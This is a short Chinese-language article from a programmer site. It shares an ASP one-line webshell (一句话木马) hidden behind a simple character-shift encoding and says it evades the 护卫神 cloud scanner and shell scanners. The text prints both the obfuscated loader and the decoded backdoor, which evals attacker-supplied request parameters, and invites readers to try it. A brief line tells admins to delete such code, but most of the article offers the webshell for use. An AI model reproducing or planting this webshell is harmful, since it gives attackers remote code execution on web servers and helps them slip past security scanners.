欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

一句话木马加密 过护卫神云查杀系统 过shell扫描器

程序员文章站 2022-03-19 12:13:26
这个一句话木马最近被利用的很多,很多扫描工具扫描不到,不过一些asp版的扫描工具支持扫描eval和execute,如果发现如下代码,请删除,下面就是他们常发的木马后门... 13-01-10...

分享给大家 暂时未测试 大家自己用用看

大马的代码是简单加密了下的!很容易解开看见 是加密的一段代码


复制代码
代码如下:

<%
codeds="li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
execute (decode (codeds) )
function decode (coded)
on error resume next
for i = 1 to len (coded)
curchar = mid (coded, i, 1)
if asc (curchar) = 16 then
curchar = chr (8)
elseif asc (curchar) = 24 then
curchar = chr (12)
elseif asc (curchar) = 32 then
curchar = chr (18)
else
curchar = chr (asc (curchar) -3)
end if
decode = decode&curchar
next
end function
response.write(decode(codeds))
%>

很简单的加密,解开一看

复制代码
代码如下:

<%
if request("xx") ="x" then eval request("hkmjj") end if
%>

经过测试,发现过目前的护卫神云查杀系统,这个貌似用的人挺多的
相关标签: 一句话木马